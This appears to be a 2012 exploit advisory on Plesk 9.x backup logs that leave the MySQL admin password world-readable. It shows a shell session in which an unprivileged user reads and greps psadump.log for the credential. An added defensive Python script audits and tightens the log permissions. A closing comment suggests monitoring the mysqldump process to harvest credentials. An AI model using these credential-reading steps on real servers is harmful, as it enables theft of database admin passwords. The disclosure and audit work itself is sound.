# Exploit Title: PLESK 9.x insecure directory permission ( admin password revealed )
# Date: 25/04/2012
# Author: Nicolas Krassas, twitter.com/dinosn
# Software Link: www.parallels.com/plesk/
# Version: 9.x
# Tested on: ubuntu / centos

During backup procedures, the PLESK panel keeps a detailed log of the process under /opt/psa/PMM/sessions on Debian/Ubuntu installations and /usr/local/psa/PMM/sessions on CentOS, in a subdirectory named after the current date. A detailed log file named psadump.log is created there with read permissions for everyone. The file reveals the admin password used by the backup process to dump the MySQL databases of the sites being backed up.

Data can also be found under the sessions directory from incomplete or crashed backup sessions, where the log files are not safely removed from the system.

|
e.g.:
|
|
|
|
$ id
|
|
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
|
|
$ cd /opt/psa/PMM/sessions
|
|
$ ls -Fal
|
|
total 32
|
|
drwxr-xr-x 8 root root 4096 2012-04-25 21:42 ./
|
|
drwxr-xr-x 10 root root 4096 2009-12-03 22:07 ../
|
|
drwxr-xr-x 3 root root 4096 2012-04-25 22:12 2012-04-25-211250.973/
|
|
$ cat 2012-04-25-211250.973/psadump.log | grep admin
|
|
18:52:26 INFO Executing bundle producer: '/usr/bin/mysqldump -h
|
|
'localhost' -u 'admin' -p' PASSOWORD ' -P '3306' --quick --quote-names
|
|
--add-drop-table --default-character-set=utf8 --set-charset 'DB'' in
|
|
|
|
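The exposure shown above is easy to audit on a host: the log lives at a fixed path, and the secret appears as the -p argument of a logged mysqldump command line. The following is an added example for this advisory, not part of the original text and not Plesk's or Parallels' own code. It lists every <date>/psadump.log under the sessions directory, reports whether the file is world-readable and how many lines carry a mysqldump password, and can restrict exposed files to owner-only. The sessions paths and the -p pattern come from the advisory; the demo directory, its log line and the placeholder password are constructed, and the function names are the example's own.

```python
"""Audit a Plesk PMM sessions directory for world-readable psadump.log files
that carry the database password on a logged mysqldump command line.

Added example for the advisory above, not Plesk/Parallels code. The layout
<sessions>/<date>/psadump.log and the -p password argument are taken from the
advisory; the demo tree built by build_demo_dir() is constructed and its
password is a placeholder."""
import os
import re
import stat
import sys
import tempfile
from pathlib import Path

# Debian/Ubuntu path per the advisory; CentOS uses /usr/local/psa/PMM/sessions.
DEFAULT_SESSIONS_DIR = "/opt/psa/PMM/sessions"

# mysqldump receives the password inline as -p'...' (or -pVALUE). Lowercase -p is
# the password switch; the uppercase -P port switch is deliberately not matched.
PASSWORD_ARG = re.compile(r"mysqldump\b.*?\s-p(?:'[^']*'|\S+)")
PASSWORD_VALUE = re.compile(r"(\s-p)(?:'[^']*'|\S+)")


def is_world_readable(path: Path) -> bool:
    """True when the 'other' read bit is set, i.e. any local user can read the file."""
    return bool(path.stat().st_mode & stat.S_IROTH)


def redact_password_args(line: str) -> str:
    """Replace the -p value so a finding can be reported without re-leaking the secret."""
    return PASSWORD_VALUE.sub(r"\1'<redacted>'", line)


def audit_sessions_dir(sessions_dir, fix=False):
    """Return [(path, world_readable, credential_line_count)] for every
    <date>/psadump.log under sessions_dir. With fix=True, exposed logs are
    reduced to owner-only (0600) after their exposure has been recorded."""
    findings = []
    root = Path(sessions_dir)
    if not root.is_dir():
        return findings
    for log in sorted(root.glob("*/psadump.log")):
        exposed = is_world_readable(log)
        credential_lines = 0
        with open(log, errors="replace") as fh:
            for line in fh:
                if PASSWORD_ARG.search(line):
                    credential_lines += 1
        if exposed and fix:
            os.chmod(log, stat.S_IRUSR | stat.S_IWUSR)  # 0600, owner only
        findings.append((str(log), exposed, credential_lines))
    return findings


def build_demo_dir() -> str:
    """Constructed stand-in for a Plesk sessions tree: one date-named session with
    a world-readable psadump.log holding a mysqldump line in the advisory's format."""
    base = Path(tempfile.mkdtemp(prefix="pmm-sessions-"))
    session = base / "2012-04-25-211250.973"
    session.mkdir()
    log = session / "psadump.log"
    log.write_text(
        "18:52:26 INFO Executing bundle producer: '/usr/bin/mysqldump -h 'localhost' "
        "-u 'admin' -p'PLACEHOLDER_PASSWORD' -P '3306' --quick --quote-names "
        "--add-drop-table --default-character-set=utf8 --set-charset 'DB''\n"
        "18:52:40 INFO bundle producer finished\n"
    )
    os.chmod(log, 0o644)  # the mode the advisory describes: readable by everyone
    return str(base)


if __name__ == "__main__":
    args = [a for a in sys.argv[1:] if a != "--fix"]
    target = args[0] if args else DEFAULT_SESSIONS_DIR
    for path, exposed, count in audit_sessions_dir(target, fix="--fix" in sys.argv):
        print(f"{path}: world_readable={exposed} mysqldump_password_lines={count}")
```

Run it with the sessions path as its argument and add --fix to tighten permissions; any line you choose to record from a finding should first go through redact_password_args so the secret is not copied into another readable file. Tightening the mode is a stopgap: the root cause is that the password is placed on a command line that gets logged at all, and, as the advisory notes, leftover session directories from crashed backups need the same check.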
Old, but I didn't see it listed: another way is to constantly monitor the system for the mysqldump process using a simple bash script to get the credentials while the process is running during the scheduled Plesk backups.